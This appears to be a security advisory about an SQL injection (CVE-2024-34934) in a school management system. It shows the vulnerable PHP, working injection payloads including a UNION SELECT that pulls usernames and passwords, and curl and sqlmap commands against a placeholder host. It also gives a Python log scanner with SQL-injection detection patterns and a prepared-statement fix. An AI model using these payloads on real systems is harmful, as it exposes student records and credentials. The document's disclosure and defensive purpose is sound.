Published: 2024
Affects: Campcodes Complete Web-Based School Management System 1.
Vulnerability Type: SQL Injection
File: /view/emarks_range_grade_update_form.php
Vulnerable Parameter: conversation_id
CVE: CVE-2024-34934

Overview

A serious SQL Injection vulnerability (CVE-2024-34934) has been discovered in Campcodes Complete Web-Based School Management System version 1.. This flaw allows attackers to inject and execute arbitrary SQL commands via the conversation_id parameter in the file /view/emarks_range_grade_update_form.php.

If you run this school management software on your server, you should read this in detail: the flaw can reveal sensitive data or even give total control over your database.

Where's The Vulnerability?

The root of the problem is the way the software handles user input for the conversation_id parameter. The input isn’t sanitized or parameterized before being placed into an SQL query.

Example vulnerable PHP code (simplified reconstruction of the affected handler):

<?php
// This is a simplified example of the vulnerable pattern, kept as-is to show the flaw
include('../config/db_connect.php'); // provides $conn (mysqli connection)

$conversation_id = $_GET['conversation_id']; // <<-- UNSAFE: raw, unvalidated user input

// <<-- DANGEROUS: the value is interpolated straight into the SQL string
$sql = "SELECT * FROM grade_changes WHERE conversation_id = '$conversation_id'";
$result = mysqli_query($conn, $sql);
// ... remainder of the page renders $result
?>

The parameter is directly shoved into the SQL query, unescaped! This is classic SQL injection territory.

How Can It Be Exploited?

An attacker simply needs to craft a malicious URL, tweaking the conversation_id parameter.

Practical Exploit Example

Let’s say the web app is running at:
http://victim-school-system.com/view/emarks_range_grade_update_form.php?conversation_id=

A normal request:

/view/emarks_range_grade_update_form.php?conversation_id=1

An attacker's request:

/view/emarks_range_grade_update_form.php?conversation_id=1' OR 1=1-- -

This conversation_id value closes the string, injects the always-true OR 1=1, and comments out the remainder of the query. The result: the query retrieves *all* records, or can be further manipulated for more damaging purposes.

Retrieve Database Version Example

/view/emarks_range_grade_update_form.php?conversation_id=1' UNION SELECT NULL, version(), NULL, NULL-- -

If the attacker knows the structure, they can try:

/view/emarks_range_grade_update_form.php?conversation_id=1' UNION SELECT id, username, password, NULL FROM users-- -

Impact

- Unauthorized data access (student records, grades, user details)
- Possible modification/deletion of records

Using curl

curl "http://victim-school-system.com/view/emarks_range_grade_update_form.php?conversation_id=1' OR 1=1-- -"

If sensitive info is returned, the app is vulnerable.

Automating data extraction example with sqlmap

sqlmap -u "http://victim-school-system.com/view/emarks_range_grade_update_form.php?conversation_id=1" --batch --dbs
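As an added defender-side example (not part of the original advisory), the script below scans web server access-log lines for requests to the affected endpoint whose conversation_id is anything other than a plain integer id, and labels the injection shapes shown above (string break-out, OR tautology, comment terminator, UNION SELECT, version() probe). It assumes the Apache/nginx "combined" log format; the sample log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus
VULN_PATH = "/view/emarks_range_grade_update_form.php"  # endpoint named in the advisory
PARAM = "conversation_id"                                # the injectable parameter
# Apache/nginx "combined" log format (assumed): client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# Markers of the injection shapes shown above: string break-out, tautology,
# comment terminator, UNION-based extraction, version() probe.
SQLI_MARKERS = [
    (r"'", "string delimiter"),
    (r"\bor\b\s+\d+\s*=\s*\d+", "tautology (OR n=n)"),
    (r"--", "SQL comment terminator"),
    (r"\bunion\b\s+(all\s+)?select\b", "UNION SELECT"),
    (r"\bversion\s*\(", "version() probe"),
]

def inspect_request(target):
    """Reasons a request target looks like CVE-2024-34934 abuse; [] when clean or off-target."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return []
    reasons = []
    for raw in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        value = unquote_plus(raw)  # second decode catches double-encoded payloads
        if re.fullmatch(r"\d+", value):
            continue  # a plain integer id is the only legitimate shape for this parameter
        reasons.append(f"non-integer {PARAM}={value!r}")
        reasons.extend(label for pat, label in SQLI_MARKERS if re.search(pat, value.lower()))
    return reasons

def scan_log(lines):
    """Return (client_ip, timestamp, reasons) for every suspicious request in the log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        reasons = inspect_request(m["target"]) if m else []
        if reasons:
            hits.append((m["ip"], m["ts"], reasons))
    return hits

# Constructed sample log lines (not real traffic): one benign request, two injection attempts.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/May/2024:17:15:30 +0000] "GET /view/emarks_range_grade_update_form.php?conversation_id=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [23/May/2024:17:16:02 +0000] "GET /view/emarks_range_grade_update_form.php?conversation_id=1%27%20OR%201%3D1--%20- HTTP/1.1" 200 48213',
    '203.0.113.9 - - [23/May/2024:17:16:40 +0000] "GET /view/emarks_range_grade_update_form.php?conversation_id=1%27%20UNION%20SELECT%20NULL%2Cversion()%2CNULL%2CNULL--%20- HTTP/1.1" 200 620',
]
if __name__ == "__main__":
    for ip, ts, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} [{ts}] {'; '.join(reasons)}")
```

Feeding the real access log through scan_log() gives a quick retrospective check for exploitation attempts against this endpoint while the patch is rolled out.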

Always sanitize user input! Here’s how you should be doing it in PHP with mysqli, using a prepared statement so the value is bound as data, never as SQL:

$conversation_id = $_GET['conversation_id'];
// $conn is the mysqli connection from db_connect.php
$stmt = $conn->prepare("SELECT * FROM grade_changes WHERE conversation_id = ?");
$stmt->bind_param("s", $conversation_id); // bound as a string parameter, never interpolated
$stmt->execute();
$result = $stmt->get_result(); // mysqli_result, usable like the output of mysqli_query()

Or, if you have to use raw input, use mysqli_real_escape_string() at the very least (but parameterized queries are strongly recommended).

References

- CVE-2024-34934 - NVD Details
- Campcodes Official Site
- OWASP SQL Injection

Conclusion

CVE-2024-34934 is a critical SQL injection vulnerability in Campcodes Complete Web-Based School Management System 1. that can have a major impact on data security. If you use this product, patch immediately, validate and sanitize all inputs, and always use parameterized queries for database access.

If you’re reading this for educational or defensive reasons, remember: never test websites you do not own or have explicit permission to audit.

Timeline

Published on: 05/23/2024 17:15:30 UTC
Last modified on: 08/20/2024 15:35:13 UTC